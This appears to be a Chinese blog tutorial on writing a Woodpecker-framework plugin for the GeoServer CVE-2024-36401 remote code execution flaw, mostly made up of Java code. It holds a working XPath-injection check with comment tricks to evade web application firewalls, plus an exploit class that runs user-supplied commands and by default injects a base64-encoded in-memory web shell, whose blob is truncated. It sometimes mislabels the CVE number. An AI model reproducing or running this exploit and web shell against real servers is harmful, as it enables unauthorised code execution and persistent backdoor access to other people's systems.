前言
Woodpecker - framework是一款专注于漏洞精准检测与深度利用的框架,对于从事红队打点工作的人员而言,无疑是一款非常实用的得力工具。本文旨在学习Woodpecker插件的开发过程,并将相关过程予以记录。
完整项目已经打包到github
https://github.com/H1ng007/CVE-2024-3640_WafBypass
环境准备
woodpecker-sdk
https://github.com/woodpecker-framework/woodpecker-sdk/releases/tag/0.1.0.beta4
woodpecker-requests
像python requests一样进行网络请求
https://github.com/woodpecker-framework/woodpecker-requests/releases/tag/0.2.0
创建项目
创建一个maven项目,groupID必须为me.gv7.woodpecker.plugin,该类是woodpecker-framework识别插件的类,jdk版本建议1.8
在项目文件夹中新建lib目录,将下载好的两个jar包添加为依赖
按照下列图片创建Package包和Class类
创建下面三个包
exploit #exp漏洞利用类 pocs #poc检测类 utils
创建下面四个类
GeoserverVulPlugin(不固定,和漏洞名相关) WoodpeckerPluginManager整个程序的入口 GeoserverlRcePoc(不固定,和漏洞名相关) GeoserverlRceExp(不固定,和漏洞名相关)
开发
WoodpeckerPluginManager
插件的入口类,在该类中注册漏洞插件。
package me.gv7.woodpecker.plugin;
// IPluginManager接口由woodpecker-sdk提供
public class WoodpeckerPluginManager implements IPluginManager{
@Override
public void registerPluginManagerCallbacks(IPluginManagerCallbacks iPluginManagerCallbacks) {
// 注册漏洞插件
iPluginManagerCallbacks.registerVulPlugin( new GeoserverVulPlugin() );
}
}GeoserverVulPlugin
该类为注册插件的实现类,需要实现IVulPlugin类,在该类中生命漏洞相关信息。
package me.gv7.woodpecker.plugin;
import me.gv7.woodpecker.plugin.pocs.GeoserverlRcePoc;
import me.gv7.woodpecker.plugin.exploit.GeoserverlRceExp;
import java.util.ArrayList;
import java.util.List;
public class GeoserverVulPlugin implements IVulPlugin{
public static IVulPluginCallbacks callbacks;
public static IPluginHelper pluginHelper;
@Override
public void VulPluginMain(IVulPluginCallbacks iVulPluginCallbacks) {
this.callbacks = iVulPluginCallbacks;
this.pluginHelper = iVulPluginCallbacks.getPluginHelper();
iVulPluginCallbacks.setVulPluginName("Geoserver CVE-2024-36401"); // 插件名字
iVulPluginCallbacks.setVulPluginAuthor("H1ng"); // 作者名
iVulPluginCallbacks.setVulPluginVersion("1.0.0"); // 插件版本
iVulPluginCallbacks.setVulName("Geoserver CVE-2024-36401"); // 漏洞名称
iVulPluginCallbacks.setVulDescription("GeoServer 调用的 GeoTools 库 API 会以不安全的方式将要素类型的属性名称传递给 commons-jxpath 库,该库在评估 XPath 表达式时可以执行任意代码。"); // 漏洞描述
// 注册漏洞验证模块
iVulPluginCallbacks.registerPoc(new GeoserverlRcePoc());
// 注册漏洞利用模块(利用模块可以有多个)
List<IExploit> exploitList = new ArrayList();
exploitList.add(new GeoserverlRceExp());
iVulPluginCallbacks.registerExploit(exploitList);
}
}GeoserverlRcePoc
需要实现IPoc接口并重写doVerify方法,该方法是执行poc检测调用的方法,检测结果保存到一个map对象responseMap中,map中包含flag和result两个变量,flag代表poc检测是否存在漏洞,result是详细说明
实际写代码下来发现woodpecker-requests虽然方便,但是功能不算强大,此处还是使用的原生支持库进行使用,jdk更换为21,woodpacker本身支持1.8及其以上版本的jdk
package me.gv7.woodpecker.plugin.pocs;
import me.gv7.woodpecker.plugin.*;
import java.io.*;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.HashMap;
import java.util.Map;
public class GeoserverlRcePoc implements IPoc {
@Override
public IScanResult doVerify(ITarget iTarget, IResultOutput iResultOutput) {
// 创建输出模块,用作结果的输出
IScanResult scanResult = GeoserverVulPlugin.pluginHelper.createScanResult();
// 设置目标地址,iTarget.getAddress()由插件面板获取地址
scanResult.setTarget(iTarget.getAddress());
// 调用漏洞验证函数
Map<String, Object> responseMap = checkConfluenceOgnl(iTarget.getAddress());
scanResult.setExists((Boolean) responseMap.get("flag"));
scanResult.setMsg((String) responseMap.get("results"));
iResultOutput.infoPrintln((String) responseMap.get("results"));
return scanResult;
}
private Map<String, Object> checkConfluenceOgnl(String address) {
Map<String,Object> responseMap = new HashMap<>();
boolean flag = false;
String results = null;
String targetUrl = address + "/geoserver/wfs";
try {
//延时5s检测poc
String xmlData = """
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>ja<!--!!!-->va.la<!--!!!-->ng.Thr<!--!!!-->ead.sl<!--!!!-->eep(5000)
</wfs:valueReference>
</wfs:GetPropertyValue>
""";
URL url = new URL(targetUrl);
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("POST");
conn.setRequestProperty("Content-Type", "application/xml; utf-8");
conn.setRequestProperty("Accept", "application/xml");
conn.setDoOutput(true);
conn.setConnectTimeout(10000); // 连接超时 10秒
conn.setReadTimeout(15000); // 读取超时 10秒
// 记录请求开始时间
long startTime = System.currentTimeMillis();
// 发送 XML 请求体
try (OutputStream os = conn.getOutputStream()) {
byte[] input = xmlData.getBytes("utf-8");
os.write(input, 0, input.length);
}
// 获取响应状态码
int statusCode = conn.getResponseCode();
// 计算总耗时
long endTime = System.currentTimeMillis();
long responseTime = endTime - startTime;
if(statusCode == 200 && responseTime> 5000){
flag = true;
results = String.format("%s存在CVE-2024-3640",address);
}else {
flag = false;
results = String.format("%s不存在CVE-2024-3640",address);
}
}catch (Exception e){
flag = false;
results = String.format("%s不存在CVE-2024-3640",address);
}finally {
// 设置responseMap的值,将flag和results带回去
responseMap.put("flag",flag);
responseMap.put("results",results);
}
// 返回
return responseMap;
}
}使用maven打包进行测试
GeoserverlRceExp
需要实现IExploit并重写getExploitCustomArgs、doExploit两个方法。getExploitCustomArgs方法用于注册变量。
doExploit方法是真正执行EXP的方法,执行结果显示使用iResultOutput对象,攻击成功调用iResultOutput.successPrintln(),攻击失败调用iResultOutput.failPrintln
完整代码如下。
package me.gv7.woodpecker.plugin.exploit;
import me.gv7.woodpecker.plugin.*;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.io.*;
import java.net.HttpURLConnection;
import java.net.URL;
public class GeoserverlRceExp implements IExploit{
@Override
public String getExploitTabCaption() {
return "代码执行"; // 选项名称
}
// 接收用户参数
@Override
public IArgsUsageBinder getExploitCustomArgs() {
IArgsUsageBinder argsUsageBinder = GeoserverVulPlugin.pluginHelper.createArgsUsageBinder();
List<IArg> args = new ArrayList<>();
IArg command = GeoserverVulPlugin.pluginHelper.createArg();
command.setDescription("执行的命令");
command.setName("Command");
command.setDefaultValue("whoami");
command.setRequired(true); // 必填
args.add(command);
IArg memshellflag = GeoserverVulPlugin.pluginHelper.createArg();
memshellflag.setDescription("是否注入内存马");
memshellflag.setName("memshellflag");
memshellflag.setDefaultValue("true");
memshellflag.setRequired(true); // 必填
args.add(memshellflag);
IArg memshellcontent = GeoserverVulPlugin.pluginHelper.createArg();
memshellcontent.setDescription("内存马base64内容");
memshellcontent.setName("memshellcontent");
memshellcontent.setDefaultValue("yv66vgAAADEBiQEADmphdmEvbGFuZy90ZXN0BwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADGdldENsYXNzTmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAPW9yZy5hcGFjaGUuY29tbW9ucy5sYW5nLlNlcnZsZXRDb250ZXh0QXR0cmlidXRlSnZ6ZXduTGlzdGVuZXIIAAgBAA9nZXRCYXNlNjRTdHJpbmcBAApFeGNlcHRpb25zAQATamF2YS9pby9JT0V4Y2VwdGlvbgcADAEAEGphdmEvbGFuZy9TdHJpbmcHAA4BDBRINHNJQUFBQUFBQUFBS1ZYYVZoVTF4bCtEek53aDJIVU9DUW8yaVl4YmpBTURPS0NRb3l5QmhUUVNJSkZrdGpMNWNLTURqUGozRHNvdHJGdGF0TXRUZmVtNmI0a3RXMjZxSTBEaG1xTWJaTTIzWmQwMy9lbWUvdW5mOUwwUGZkZUJtWVl4T2ZwTTNDWGM3N3YvYjd6ZnNzNTk1bi9QbjRSd0FiOFcyQjdQRGtTVWhPcUZ0WkRXbngwTkI0elFsRTFOaExxMVpOalVkMXNpY2RNL1pqWlpKckp5R0RLMUhlTkhkZVB4cm9paHFuSDlLUUNJWERkSVhWTXRaVmFvcXBoZE1YVklUbmxFbGdqcDQ2RkRCdHJHbk9mZmlTbEcrWU1TS0ZBMGMyUldNUzhSY0JWVWRrbjRHNkpEK2tDUzdvaU1iMG5OVHFvSjI5WEI2TWM4WGZGTlRYYXB5WWo4dDBaZEp2aGlDR3dvK3YvV2t5akR3bzhYcml4V0dCRlJWZmVaVFZLNzRRbXNHeWVlUWx5alFRcHBkd0kyYWtZYUs3TWxXM2szS0JBd1VDelFNbVFQc3hWV3VPRXBYaG41MXdGSDhxeFFzS3VGTGdtYVJQWXl2OWtmRndmRWxobnV6c2YxVzFqZXN5MFhDODE1azRJckw0S2JYTHYyTzFrcENKcU5ISmNXaTZkOGJUdG1LWW56RWc4cHVBbUx0ekIxSkxqQ1RNZWFva2t3cVJId0pQVWpRUWp3N2psT2gwMnpVU29nNWVNZlZ1U1dvcWhHd2FoQlc2Y1g4bVNvTEFyUG5oSUpvL2xXc3FNUkVQZGFrS0NPQXNRV0wrZ1pVdVFPcXNXWkVaQnRjRGFxOEpURUdLc3JtN1JDallJWEgvbHRTcllLTEFvYTVrS05uT28xMVMxdzN4ekNtVHBpRzVtZTBJZUt5cXZHSFdtM0Zaczg2SUdEUUxlc0M2enUwY2R0V3B3SnVhOUxLWFlDR1Z2eHZaaUZJQVZYRXhqSFpaNEppK3paQ3Z6cWU5RVV3bHFJZXZCTnRXblJsTzZENjAyYkJ1elBsZEx3YTNNSm8wMXJVWmlMSjJWV1NVYlZwTzljaUV4VFcrc1BPQkRKM1o1MFlIZEFtVWpNeVMzSitPakdVWnVXemdmYldaeWlaczNiMzNvUm8rWC91OGhoVllNbkNTK2FRNzVjOUxZaDl1d1QzTFN5L2pOaExoRE5jSldtTy93b2crTFBhaGl2aWRTZEgvcjdQWHZHVHlrYTJiajNKSEt1VU0rOU9OQUNiWmd3SU8xSHF4bmMwcDVjSkI5TmNIVzQ0TnF4NEFOeTBORFZtQllRWGtpbThkYW53OUQwRXV3Q2NQMHM2bXQxNE93MHpSeVdvTUMxbXdKU2VxTUdhYktzQWxVenBzOXVXM0ZoeWhHdlRnTWNudERsb0NSMERWbXRwYlV6ZDM2ZUMvZkZDUzRFaHBxSGpkMTVvMjdvbktnMllja0RKa2dwdDJEOHhqdWs2MTl6SXNqT0VvbHVWMUowVTViMHRDMVZESmlqb2RveEJJZHgzSHB6OHV5RXRkbVJjRTl0Z05PenkrdHlOZnZYNEZYZW5FQ3IySWp5NWxVOEdxQnhkUDY5cjRqVUQ0WEpiTWx2UWIzZVhFU3I1V3BXR3BYNkQ2blFsZE1xMFhpb2ViVThMQ2UxSWZzT2VxOUFXK1VHWGcvaXlhL2pJSUhySTZ1RHNtZFd1RGFpcnpWL1JhODFZczM0MjBDdmtIVjBMZHNhdFUxYTRNdnl4ZGhHWTEzNEozUzJYZXhhUS9GMnlNeE5jb3pndHhLNWVTNzhaRGs5ajArWEljeUtmWStaazVNUHpxVE9kbCtaUEw4QS9pZzVPRkR4R0lwcTFGRDdzOTVzcGI5NGlQNHFLVC9ZUlp1WmwranVPZWdGbFpqTVQzcXdTbUJRaExaM3JkZzZlVnBmQm1YUG9GUHloVTh5cWdjbk40WlBmZzBGM1NRclMxR0lScjI0TFBPWG1Ccjk4UjdVMXE0UGFKSGgyWnR1bWVZbG1OcWN2UDBIam0vYktNdFdadmR5eDJmN0xrTjlxMk9pVFZMSktrUFJ5a1RzdUFjU1c1QlMvTWNjSmJObzZYZzg2d0pFc2NjaUtyTUpHdFVvSHFCclNMYnRBOFg4WVNNNVNYdWRyS3pwaEo2VW90YS9lcXlySnlUK0VKT2NMUHErRXRlbk1WVDFEVjBzMG5UWk0rMWo1SVZCNlRBbC9FVkx5N2dHZllzZ3Vmc1kxZnFwRi9EMTZYaU41Z2I5T2I0Y1ptL1ZxNG5wMDlFT1djbGVWemhNWTZsWUtSaU5hTVJRNnRwYnVwdG15NlJwQWZmSThadzNObDcxeTdBMG5UMytENStJRG40SVN2T3RtL1hyUWMvdHN1L1d6ZkRjYksrTXcvZXdCeThmSEd3RVdqcXAvaVpOUFZ6Z2VYelNTbjRKVXN1RWh1TEgrWWF0dVVoYytBcStmMDFmdVBGci9CYkJjdWR6bG9qdDhXYVpxdXRlUEFIZTZQTmtQY24yclVKOE9EUDFLamJOancwWEwrbGZ1UG0rcnBhdlhhTEIzK2x4aDNjaGF1YlJuaVk4K0R2cEx0ditORDQ0YU9IUFBnblZyRTQzU0FLWEx4eUsrU1hrNUNuSGV2ZWF0MDlmRktzYXpIZjJxZ2hlRjhXbU1DU2dQOXY1NkFGL1A4NGh4MEIvNy9Pb2YwTXB3cmc1VlhXUFZERzN6S1U4TWxucS9HK3lBTG5oNFFEdVplU1VuWjVvR29DMXk2TXVZSW9LeTNNTWx2UHdaUlBTK0VucXBDdDAwSGZ6Z1ZLcWVKQWxhdnE0Z1JlZERvRFYyUzVkTU1zcU9JTVZER05MTGVnWG96ckhhak5saWFkUDVNRHNXWVdoTWhBY0xQR2pSYkVxbWtJOFRBMUZNNWRya3FqOFJKcXU0T0J4N0RqUEZvSzhCUWVuWG5oUTNzYVhRL2h3VUJ3QW50N2d1ZHh1MENEZXdwOS9SUFkzMUJZWHVoL0NRZnZkR0UvSCsrcXpqemVYZTUybnQzK2x4SkdPNDhSRi95UlNjUWJpc3FMQ3Fkd3BGOE9wNUh5Unlad0xJMlhUNkdnUDVER3ZXbThiZ0t2THk4S0VQaE5BbW04UFkwSDAzaHZHdTlQNDhQbGhXazhzdjhVQ2h1S1RzSGRjMFllbWpDSktheG1jbHpBSmQ1ZEZpZnRqQUt3bnFPVi9BVVFRaFhxRWVRcHVCcTdlZUx1NDhnZ1A5RGpxTU1ZTnVKK25wOG1lVUNiSXNFWDBFQ2tyWGlTU1NnNTdaQ25FalFUY1EyWkMrRUJyTVU2MnFuSGZiUlF3ZGp1eEQyV2xVTEphb2I3eXc3M0hqeE82MEg2V3MvUmRYQy9RRE5GQ2dvVTFDaW9WVkNuWUpOQzQwTEI2djlBTlBNbVk4dVRMYThmbzQ0c2o5VlcrQnV0WXVIS3F2d2ZuOFNuL0ovaDVSTHF1aytocktmS2Z6cDd5QlU4YmFYR0VpWWtFZWtnOTBJQ1NLQm51UURwN2xiUkxXbnZxZmFmZUFSbDFVeUpKNm01cU1GZG5jWVhlMDY5OEZ6d2FmaW1jTGFmZGZIMEUwRjNHbDhOVXVHYkVua1JTcGx3WngzSzY3aHdvSVg0clNTc25iTWRuTytreEM1bThXN21jQmZwMkVNUzl6SUkreWpmYTlHN2lYNHM1Ly9uOEppMXRLMDR4N0REZXBwZzZmQXJudHhNNGp6di9HUWptVk1XK1dCQTNNOURVWEJCd2NrZUJXZUxmYlBZRXZLRTR5ejJlY1pOTG5iYy8rd2tmdFFkOVAvRWZRRW4rMTMranQ0MGZoRmtZdkg5UkwrcmlxKy91NFRmWi81T2Qvdi9TQTJ5ODV5TEdoUVd2SitnVklPN25GemM2Ly9MYktSeTkzdzRWaHhxNmYxMGdxNmdTK0JuUVJFT2NIU0FiTnpKOWQ1Rmp1NjJXTG1GTTBWTW0yOXh0UVdjYWJLZVhKeXZ4cmZKajVzYXQ1S3o3MWdGUDU1SnVuRjgxK0tzM200TVIyUXV6WkNDL3dIUWl3YjRtaElBQUE9PQgAEAEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAEgATCgAPABQBAAMoKVYBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAXAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAIbGlzdGVuZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdjb250ZXh0AQAIY29udGV4dHMBABBMamF2YS91dGlsL0xpc3Q7AQAEdGhpcwEAEExqYXZhL2xhbmcvdGVzdDsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQAkTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAOamF2YS91dGlsL0xpc3QHACQBABJqYXZhL3V0aWwvSXRlcmF0b3IHACYBAA1TdGFja01hcFRhYmxlDAASABYKAAQAKQEACmdldENvbnRleHQBABIoKUxqYXZhL3V0aWwvTGlzdDsMACsALAoAAgAtAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7DAAvADALACUAMQEAB2hhc05leHQBAAMoKVoMADMANAsAJwA1AQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAA3ADgLACcAOQEAC2dldExpc3RlbmVyAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMADsAPAoAAgA9AQALYWRkTGlzdGVuZXIBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYMAD8AQAoAAgBBAQASY29udGV4dENsYXNzTG9hZGVyAQAGdGhyZWFkAQASTGphdmEvbGFuZy9UaHJlYWQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsHAEcBABBqYXZhL2xhbmcvVGhyZWFkBwBJAQATamF2YS91dGlsL0FycmF5TGlzdAcASwoATAApAQARZ2V0QWxsU3RhY2tUcmFjZXMBABEoKUxqYXZhL3V0aWwvTWFwOwwATgBPCgBKAFABAA1qYXZhL3V0aWwvTWFwBwBSAQAGa2V5U2V0AQARKClMamF2YS91dGlsL1NldDsMAFQAVQsAUwBWAQANamF2YS91dGlsL1NldAcAWAEAB3RvQXJyYXkBACgoW0xqYXZhL2xhbmcvT2JqZWN0OylbTGphdmEvbGFuZy9PYmplY3Q7DABaAFsLAFkAXAEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAJihMamF2YS9sYW5nL1RocmVhZDspTGphdmEvbGFuZy9PYmplY3Q7DABeAF8KAAIAYAEAE2lzV2ViQXBwQ2xhc3NMb2FkZXIBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoMAGIAYwoAAgBkAQAfZ2V0Q29udGV4dEZyb21XZWJBcHBDbGFzc0xvYWRlcgwAZgA8CgACAGcBAANhZGQMAGkAYwsAJQBqAQAQaXNIdHRwQ29ubmVjdGlvbgEAFShMamF2YS9sYW5nL1RocmVhZDspWgwAbABtCgACAG4BABxnZXRDb250ZXh0RnJvbUh0dHBDb25uZWN0aW9uDABwAF8KAAIAcQEACVNpZ25hdHVyZQEAJigpTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47CABeAQAMaW52b2tlTWV0aG9kAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAHYAdwoAAgB4AQALY2xhc3NMb2FkZXIBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMAHsAfAoABAB9AQAPamF2YS9sYW5nL0NsYXNzBwB/AQAHZ2V0TmFtZQwAgQAGCgCAAIIBABFXZWJBcHBDbGFzc0xvYWRlcggAhAEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDACGAIcKAA8AiAEAB2hhbmRsZXIBAAhfY29udGV4dAgAiwEABWdldEZWDACNAHcKAAIAjgEAD19zZXJ2bGV0SGFuZGxlcggAkAEAD19jb250ZXh0SGFuZGxlcggAkgEADmh0dHBDb25uZWN0aW9uAQAFZW50cnkBAAFpAQABSQEADHRocmVhZExvY2FscwEABXRhYmxlCACYCACZAQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkHAJwBAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkMAJ4AnwoAnQCgAQADZ2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0kpTGphdmEvbGFuZy9PYmplY3Q7DACiAKMKAJ0ApAEABXZhbHVlCACmAQAOSHR0cENvbm5lY3Rpb24IAKgBAAtodHRwQ2hhbm5lbAEAB3JlcXVlc3QBAAdzZXNzaW9uAQAOc2VydmxldENvbnRleHQBAA5nZXRIdHRwQ2hhbm5lbAgArgEACmdldFJlcXVlc3QIALABAApnZXRTZXNzaW9uCACyAQARZ2V0U2VydmxldENvbnRleHQIALQBAAZ0aGlzJDAIALYBABhIdHRwQ29ubmVjdGlvbiBub3QgZm91bmQIALgKABgAFAEAE2phdmEvbGFuZy9UaHJvd2FibGUHALsBAAljbGF6ekJ5dGUBAAJbQgEAC2RlZmluZUNsYXNzAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAVjbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwDGAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DADIAMkKAEoAygEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsMAF4AzAoASgDNAQAOZ2V0Q2xhc3NMb2FkZXIMAM8AzAoAgADQDAAFAAYKAAIA0gEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMANQA1QoAxwDWAQALbmV3SW5zdGFuY2UMANgAOAoAgADZDAAKAAYKAAIA2wEADGRlY29kZUJhc2U2NAEAFihMamF2YS9sYW5nL1N0cmluZzspW0IMAN0A3goAAgDfAQAOZ3ppcERlY29tcHJlc3MBAAYoW0IpW0IMAOEA4goAAgDjCAC/BwC+AQARamF2YS9sYW5nL0ludGVnZXIHAOcBAARUWVBFDADpAMIJAOgA6gEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwA7ADtCgCAAO4BABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHAPABAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwA8gDzCgDxAPQBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwA9gD3CgDoAPgBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAPoA+woA8QD8AQAKaXNJbmplY3RlZAEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspWgwA/gD/CgACAQABABBhZGRFdmVudExpc3RlbmVyCAECAQAXamF2YS91dGlsL0V2ZW50TGlzdGVuZXIHAQQBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAHYBBgoAAgEHAQAOZXZlbnRMaXN0ZW5lcnMBABpbTGphdmEvdXRpbC9FdmVudExpc3RlbmVyOwEACWNsYXNzTmFtZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwcBCgEAEWdldEV2ZW50TGlzdGVuZXJzCAEOAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEAB2lnbm9yZWQBAAliYXNlNjRTdHIBABRMamF2YS9sYW5nL0NsYXNzPCo+OwEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIIARUBAAdmb3JOYW1lDAEXANUKAIABGAEADGRlY29kZUJ1ZmZlcggBGgEACWdldE1ldGhvZAwBHADtCgCAAR0BABBqYXZhLnV0aWwuQmFzZTY0CAEfAQAKZ2V0RGVjb2RlcggBIQEABmRlY29kZQgBIwEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwElAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgcBJwEAK2phdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25UYXJnZXRFeGNlcHRpb24HASkBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcBKwEADmNvbXByZXNzZWREYXRhAQADb3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAmluAQAeTGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW07AQAGdW5nemlwAQAfTGphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtOwEABmJ1ZmZlcgEAAW4BAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQcBNgEAHGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW0HATgBAB1qYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbQcBOgoBNwApAQAFKFtCKVYMABIBPQoBOQE+AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWDAASAUAKATsBQQEABHJlYWQBAAUoW0IpSQwBQwFECgE7AUUBAAV3cml0ZQEAByhbQklJKVYMAUcBSAoBNwFJAQALdG9CeXRlQXJyYXkBAAQoKVtCDAFLAUwKATcBTQEAA29iagEACWZpZWxkTmFtZQEABWZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABGdldEYBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAVMBVAoAAgFVAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHAVcKAVgA9AwAogA8CgFYAVoBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HAVwBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAV8BYAoAgAFhAQANZ2V0U3VwZXJjbGFzcwwBYwB8CgCAAWQKAV0AFAEADHRhcmdldE9iamVjdAEACm1ldGhvZE5hbWUBAAdtZXRob2RzAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAhTGphdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEACnBhcmFtQ2xhenoBABJbTGphdmEvbGFuZy9DbGFzczsBAAVwYXJhbQEAE1tMamF2YS9sYW5nL09iamVjdDsBAAZtZXRob2QBAAl0ZW1wQ2xhc3MHAWoBABJnZXREZWNsYXJlZE1ldGhvZHMBAB0oKVtMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwBdAF1CgCAAXYKAPEAggEABmVxdWFscwwBeQBjCgAPAXoBABFnZXRQYXJhbWV0ZXJUeXBlcwEAFCgpW0xqYXZhL2xhbmcvQ2xhc3M7DAF8AX0KAPEBfgoBKAAUAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24HAYEBAApnZXRNZXNzYWdlDAGDAAYKASwBhAoBggAUAQAIPGNsaW5pdD4KAAIAKQAhAAIABAAAAAAAEwABAAUABgABAAcAAAAQAAEAAQAAAAQTAAmwAAAAAAABAAoABgACAAsAAAAEAAEADQAHAAAAFwADAAEAAAALuwAPWRMAEbcAFbAAAAAAAAEAEgAWAAEABwAAANcAAgAFAAAANSq3ACoqtgAuTCu5ADIBAE0suQA2AQCZABosuQA6AQBOKi23AD46BC0ZBLgAQqf/46cABEyxAAEABAAwADMAGAAEABkAAAAmAAkAAAAhAAQAIwAJACQAIAAlACcAJgAtACcAMAAqADMAKAA0ACwAGgAAACoABAAnAAYAGwAcAAQAIAANAB0AHAADAAkAJwAeAB8AAQAAADUAIAAhAAAAIgAAAAwAAQAJACcAHgAjAAEAKAAAABoABP8AEAADBwACBwAlBwAnAAD5AB9CBwAYAAAAACsALAACAAcAAAFCAAMACAAAAHe7AExZtwBNTLgAUbkAVwEAA70ASrkAXQIAwABITSxOLb42BAM2BRUFFQSiAEstFQUyOgYqGQa3AGE6ByoZB7cAZZkAEysqGQe3AGi5AGsCAFenABkqGQa3AG+ZABArKhkGtwByuQBrAgBXpwAFOgeEBQGn/7QrsAABADMAagBtABgABAAZAAAAMgAMAAAALwAIADAAHQAxADMAMwA7ADQARAA1AFQANgBdADcAagA6AG0AOQBvADEAdQA8ABoAAAA0AAUAOwAvAEMAHAAHADMAPABEAEUABgAAAHcAIAAhAAAACABvAB4AHwABAB0AWgBGAEcAAgAiAAAADAABAAgAbwAeACMAAQAoAAAALQAG/wAmAAYHAAIHACUHAEgHAEgBAQAA/QAtBwBKBwAE+gAVQgcAGPoAAfgABQBzAAAAAgB0AAIAXgBfAAIABwAAADsAAgACAAAABysSdbgAebAAAAACABkAAAAGAAEAAABAABoAAAAWAAIAAAAHACAAIQAAAAAABwBEAEUAAQALAAAABAABABgAAgBiAGMAAQAHAAAAQQACAAIAAAANK7YAfrYAgxKFtgCJrAAAAAIAGQAAAAYAAQAAAEQAGgAAABYAAgAAAA0AIAAhAAAAAAANAHoAHAABAAIAZgA8AAIABwAAAGUAAgAEAAAAFSsSjLgAj00sEpG4AI9OLRKTuACPsAAAAAIAGQAAAA4AAwAAAEgABwBJAA4ASgAaAAAAKgAEAAAAFQAgACE